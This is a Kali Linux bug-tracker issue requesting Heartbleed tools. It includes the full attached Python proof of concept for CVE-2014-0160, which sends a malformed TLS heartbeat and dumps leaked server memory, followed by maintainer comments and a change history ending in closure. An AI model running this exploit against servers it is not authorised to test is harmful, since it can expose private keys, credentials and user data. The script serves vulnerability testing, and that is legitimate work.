View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0001147 | Kali Linux | New Tool Requests | public | 2014-04-11 19:31 | 2020-03-18 17:47 |
Reporter | Pokeswap | Assigned To | |||
Priority | normal | Severity | feature | Reproducibility | N/A |
Status | closed | Resolution | suspended | ||
Platform | x64 | OS | Kali | OS Version | 1.0 |
Summary | 0001147: heart bleed tools (Heartbleeder, Heartbleed Attack POC and Mass Scanner, Heartbleed Honeypot Script) | ||||
Description | Please add heart bleed tools to the kali repos. | ||||
Attached Files | 2014-0160.py (4,437 bytes)
#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser from binascii import unhexlify options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') def h2bin(x): #x=x.encode('ascii', 'strict') return unhexlify(x.replace(' ', '').replace('\n', '')) hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print (' %04x: %-48s %s' % (b, hxdat, pdat)) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print ('Unexpected EOF receiving record header - server closed connection') return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print ('Unexpected EOF receiving record payload - server closed connection') return None, None, None print (' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print ('No heartbeat response received, server likely not vulnerable') return False if typ == 24: print ('Received heartbeat response:') hexdump(pay) if len(pay) > 3: print ('WARNING: server returned more data than it should - server is vulnerable!') else: print ('Server processed malformed heartbeat, but did not return any extra data.') return True if typ == 21: print ('Received alert:') hexdump(pay) print ('Server returned error, likely not vulnerable') return False def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print ('Connecting...') sys.stdout.flush() s.connect((args[0], opts.port)) print ('Sending Client Hello...') sys.stdout.flush() s.send(hello) print ('Waiting for Server Hello...') sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print ('Server closed connection without sending Server Hello.') return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print ('Sending heartbeat request...') sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main() | ||||
I have sent an email to the creators of Heartbleed Attack POC and Mass Scanner and Heartbleed Honeypot Script, requesting some info about the license of the tools. For Heartbleeder, it requires a version of the go language we currently do not support. I'm waiting for the replies |
|
Code has been updated with GPLv3 and version 0.1.1 |
|
Heartbleed Honeypot Script added |
|
To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will for us):
|
|
Wonder if this would be better on exploit-db.com... |
|
No response... Closing. Please reopen if the information can be provided. |
|
Date Modified | Username | Field | Change |
---|---|---|---|
2014-04-11 19:31 | Pokeswap | New Issue | |
2014-04-13 09:20 | crossbower | Note Added: 0001688 | |
2014-04-13 09:21 | crossbower | Assigned To | => crossbower |
2014-04-13 09:21 | crossbower | Status | new => feedback |
2014-04-14 03:07 | glitch | Note Added: 0001691 | |
2014-04-14 10:18 | Pokeswap | File Added: 2014-0160.py | |
2014-04-27 19:56 | crossbower | Note Added: 0001732 | |
2014-05-12 17:16 |
|
Issue cloned: 0001204 | |
2018-01-26 09:57 | g0tmi1k | Status | feedback => new |
2018-01-26 09:57 | g0tmi1k | Category | Feature Requests => New Tool Requests |
2018-01-29 10:10 | g0tmi1k | Assigned To | crossbower => |
2018-01-29 10:10 | g0tmi1k | Priority | high => normal |
2018-01-29 10:10 | g0tmi1k | Severity | major => minor |
2018-01-29 10:10 | g0tmi1k | Summary | hart bleed tools => heart bleed tools (Heartbleeder, Heartbleed Attack POC and Mass Scanner, Heartbleed Honeypot Script) |
2018-01-29 14:59 | g0tmi1k | Note Added: 0008405 | |
2018-01-30 10:41 | g0tmi1k | Note Added: 0008576 | |
2019-12-09 13:30 | g0tmi1k | Severity | minor => feature |
2020-03-18 17:47 | g0tmi1k | Status | new => closed |
2020-03-18 17:47 | g0tmi1k | Resolution | open => suspended |
2020-03-18 17:47 | g0tmi1k | Note Added: 0012452 |